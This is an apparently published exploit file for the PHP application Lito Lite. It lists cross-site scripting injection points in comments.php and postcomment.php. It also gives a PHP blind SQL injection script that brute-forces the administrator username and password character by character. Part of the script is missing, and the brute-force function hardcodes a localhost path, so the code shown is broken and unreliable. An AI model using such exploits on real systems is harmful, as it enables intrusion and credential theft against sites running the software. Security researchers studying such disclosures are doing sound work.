#--+++===================================================================================+++--# #--+++====== Lito Lite Multiple Cross Site Scripting / Blind SQL Injection Exploit ======+++--# #--+++===================================================================================+++--# # [+] XSS # [+] comments.php?id=>[js code] # [+] postcomment.php?id=>[js code] #!/usr/bin/php (.+?)div>/", $cont, $x); if (strlen ($x [1]) == 2) return false; else return true; } function brute ($host, $path, $fld, $key) { $pos = 1; $chr = 0; while ($chr < strlen ($key)) { if (check ("localhost", "/xampp/lito_lite", $fld, $pos, $key [$chr])) { $res .= $key [$chr]; $chr = -1; $pos++; } $chr++; } return $res; } function usage () { echo "[+] Lito Lite Blind SQL Injection Exploit\n". "[+] Author: darkjoker ~ http://darkjokerside.altervista.org ~ darkjoker93[at]gmail[dot]com\n". "[+] Usage: php " . $argv [0] . " [key]\n". "[+] Ex. php ". $argv [0] . " localhost /lito_lite abcdefghijklmnopqrstuvwxyz0123456789\n". "[+] Greetz to athos, marco6\n"; exit (); } if (count ($argv) < 3) usage (); $host = $argv [1]; $path = $argv [2]; if (empty ($argv [3])) $key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; else $key = $argv [3]; echo "[+] Username: " . brute ($host, $path, "username", $key) . "\n". "[+] Password: " . brute ($host, $path, "password", $key) . "\n"; ?>